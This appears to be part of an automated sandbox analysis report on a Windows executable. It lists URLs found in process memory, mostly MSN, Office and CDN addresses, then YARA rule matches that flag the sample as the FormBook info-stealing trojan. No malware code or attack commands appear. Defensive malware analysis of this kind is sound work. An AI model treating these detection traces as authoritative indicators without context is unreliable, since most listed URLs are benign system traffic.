                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000003.00000003.3076012374.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                Source: duGqHKp0OUXaX1D.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
